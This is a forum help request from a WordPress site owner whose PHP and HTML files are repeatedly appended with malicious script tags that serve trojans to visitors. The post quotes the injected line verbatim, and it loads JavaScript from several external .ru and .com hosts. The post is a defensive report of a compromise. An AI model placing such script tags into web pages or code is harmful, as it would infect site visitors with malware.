js code appended to my client’s site

Hi,
I a facing a problem at this site (https://mahasldc.in) since the past 3-4 months – everytime one visits the site, a few trojans attempt to download on the client’s machine.

On taking a closer look at the template and other files, I found that all the php and html files have been appended with a javascript just bfore the end of the file that connects to a few russian sites and downloads the trojans. the code looks like this:

<script src=https://www.lodse.ru/fgg.js></script><script src=https://www.sdkj.ru/fgg.js></script><script src=https://www.sdkj.ru/fgg.js></script><script src=https://www.nbh3.ru/js.js></script><script src=https://www.cv32.ru/script.js></script><script src=https://www.aspx46.com/script.js></script>

I started with WP 2.2.2 and now have 2.6.1. Somewhere around 2.3.3 this problem started and I re-created the site afresh, reset the passwords etc. but the problem persists. The newer files (that are uploaded) get visited at regular intervals and appended to. I have contacted the host and they have ruled out the possibility of a server compromise, since no other sites have reported this problem.

Anybody can tell why and how this happens and what I should do to prevent it in future?
Any help will be highly appreciated. Thanks
– icubyx